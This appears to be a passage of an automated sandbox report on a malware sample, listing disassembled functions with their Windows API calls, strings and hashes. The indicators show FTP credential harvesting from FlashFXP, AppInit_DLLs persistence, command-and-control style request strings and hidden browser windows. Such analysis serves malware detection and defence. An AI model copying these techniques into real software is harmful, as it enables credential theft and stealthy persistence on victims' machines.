VariantClear.OLEAUT32(00000016), ref: 00408E7A

Strings

+@, xrefs: 00408CB7
_self, xrefs: 00408ED5
http, xrefs: 00408E1A

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: ClearVariant
String ID: _self$http$+@
API String ID: 1473721057-3317424838
Opcode ID: d8f59335e3977134d7c78f43a1f56087f7ef2e3c30fa3fc2b5598e0363074b87
Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
Opcode Fuzzy Hash: d8f59335e3977134d7c78f43a1f56087f7ef2e3c30fa3fc2b5598e0363074b87
Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406ADF Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 136registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A

Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17

Strings

application/x-javascript, xrefs: 00406B68
SOFTWARE\Classes\MIME\Database\Content Type\, xrefs: 00406AF6, 00406B5D, 00406BE8
CLSID, xrefs: 00406B3B, 00406B40, 00406B9D, 00406BB5, 00406C28, 00406C40
text/html, xrefs: 00406B01
text/javascript, xrefs: 00406BF3

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Open$CloseQueryValue
String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
API String ID: 3546245721-1332223170
Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A156 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
SetParent.USER32(00000000,00000000), ref: 0040A1E2
GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E

Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3

Strings

Shell_TrayWnd, xrefs: 0040A1CF
eventConn, xrefs: 0040A188

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
String ID: Shell_TrayWnd$eventConn
API String ID: 2141107913-3455059086
Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004047CC Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 226memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C

HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
StrStrIA.SHLWAPI(?,?), ref: 00404913
StrStrIA.SHLWAPI(?,?), ref: 00404925
StrStrIA.SHLWAPI(?,?), ref: 00404935
StrStrIA.SHLWAPI(?,?), ref: 00404947

Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9

Strings

ftplist.txt, xrefs: 00404805
ftp://%S:%S@%S:%u, xrefs: 004049F6

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
String ID: ftp://%S:%S@%S:%u$ftplist.txt
API String ID: 1635188419-1322549247
Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00407362 Relevance: 13.6, APIs: 9, Instructions: 114timesynchronizationCOMMON

Download Yara Rule

APIs

CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
GetLocalTime.KERNEL32(?), ref: 00407387
GetLocalTime.KERNEL32(?), ref: 0040738D
GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
String ID:
API String ID: 3166187867-0
Opcode ID: 8616424921b6ce0bb56b9c9dfbc93343bf37786535cdacee7c7c77324956f8a5
Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
Opcode Fuzzy Hash: 8616424921b6ce0bb56b9c9dfbc93343bf37786535cdacee7c7c77324956f8a5
Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004089FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 267COMMON

Download Yara Rule

Strings

+@, xrefs: 004089FD
http, xrefs: 00408B59

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID:
String ID: http$+@
API String ID: 0-4127549746
Opcode ID: c2f59c2b5613c0f8dd3e4d6de400bb210f2aef3e4c88ef312eb644251266033a
Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
Opcode Fuzzy Hash: c2f59c2b5613c0f8dd3e4d6de400bb210f2aef3e4c88ef312eb644251266033a
Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00403740 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804

Strings

&, xrefs: 004037EA
SOFTWARE\FlashFXP\3, xrefs: 0040375E
*flashfxp*, xrefs: 004037CE
datafolder, xrefs: 0040376D
#, xrefs: 004037DC

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
API String ID: 1994525040-4055253781
Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69

Uniqueness

Uniqueness Score: -1.00%

Function 00409909 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 004099EB
SysAllocString.OLEAUT32(?), ref: 004099F9

Strings

<url>, xrefs: 0040991C
</url>, xrefs: 00409917
http://, xrefs: 00409941
<domain>, xrefs: 004099BD
</domain>, xrefs: 004099B8

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: AllocString
String ID: </domain>$</url>$<domain>$<url>$http://
API String ID: 2525500382-924421446
Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99

Uniqueness

Uniqueness Score: -1.00%

Function 00408F26 Relevance: 12.2, APIs: 8, Instructions: 164COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(75C0F6A0), ref: 00408F82
SysFreeString.OLEAUT32(0000000B), ref: 00409046

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: f1232823454a9de15ab73cfed205648ff3cd14be94bb6ef3f987156c3e0446fe
Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
Opcode Fuzzy Hash: f1232823454a9de15ab73cfed205648ff3cd14be94bb6ef3f987156c3e0446fe
Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC93 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 105sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18

Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
Sleep.KERNEL32(0000EA60), ref: 0040AD76
Sleep.KERNEL32(00002710), ref: 0040ADA4

Strings

hOA, xrefs: 0040ACC0
job^rev=%s^os=%s, xrefs: 0040ACDB
^rcn=1, xrefs: 0040AD37
d, xrefs: 0040ADB6
0, xrefs: 0040AD12

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Sleep$AttemptConnectInternet
String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
API String ID: 362191241-2593661552
Opcode ID: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
Opcode Fuzzy Hash: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B

Uniqueness

Uniqueness Score: -1.00%

Function 0040D790 Relevance: 10.8, APIs: 7, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 0040D892
__FindPESection.LIBCMT ref: 0040D8AC

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
Opcode Fuzzy Hash: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00408825 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 004088E4
SysFreeString.OLEAUT32(?), ref: 004088E9
SysFreeString.OLEAUT32(?), ref: 004089D3
SysFreeString.OLEAUT32(?), ref: 004089D8
SysFreeString.OLEAUT32(?), ref: 004089F3

Strings

+@, xrefs: 0040884C

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: FreeString
String ID: +@
API String ID: 3341692771-3835504741
Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040253C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 113sleepprocessfileCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3

Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18

_memset.LIBCMT ref: 004025DA
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D

Strings

none, xrefs: 00402614

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
String ID: none
API String ID: 2353737338-2140143823
Opcode ID: c6b2da4a895c5a3c06ad821b8c76fb1796c02a28dfb90d6d9730734cddc33c41
Instruction ID: 23ab6f573089ca27c74aa918c09813edc931bf25471b74fd790eff350109b64e
Opcode Fuzzy Hash: c6b2da4a895c5a3c06ad821b8c76fb1796c02a28dfb90d6d9730734cddc33c41
Instruction Fuzzy Hash: 8D319231A00219ABCB21EF61DE49AEF7769FF04748F00043BF905B21C1D6789A51CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 004094B6 Relevance: 10.6, APIs: 7, Instructions: 81COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 004094E6

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84

Uniqueness

Uniqueness Score: -1.00%

Function 0040A245 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040A26B
SysAllocString.OLEAUT32(?), ref: 0040A28E
SysAllocString.OLEAUT32(?), ref: 0040A296
SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
SysFreeString.OLEAUT32(?), ref: 0040A2CF

Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009

Strings

J(@, xrefs: 0040A29E, 0040A2A1

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
String ID: J(@
API String ID: 3143865713-2848800318
Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00408604 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 53registryfileCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
GetLastError.KERNEL32(?,00000000), ref: 0040864A

Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED

DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687

Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22

Strings

Software\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 00408619, 0040861E, 00408676
C:\WINDOWS\system32\gbdwpbm.dll, xrefs: 00408682
AppInit_DLLs, xrefs: 00408639, 00408671

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
API String ID: 4026185228-3265104503
Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD

Uniqueness

Uniqueness Score: -1.00%

Function 00409A99 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00409B00
SysAllocString.OLEAUT32(?), ref: 00409B0E

Strings

<url>, xrefs: 00409AD1
</url>, xrefs: 00409ACC
</title>, xrefs: 00409AA7
<title>, xrefs: 00409AAC

Memory Dump Source

Source File: 0000000D.00000002.2465652381.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.2465605518.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465691392.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2465751687.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_omsecor.jbxd

Similarity

API ID: AllocString
String ID: </title>$</url>$<title>$<url>
API String ID: 2525500382-2286408829
Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4

Uniqueness

Uniqueness Score: -1.00%

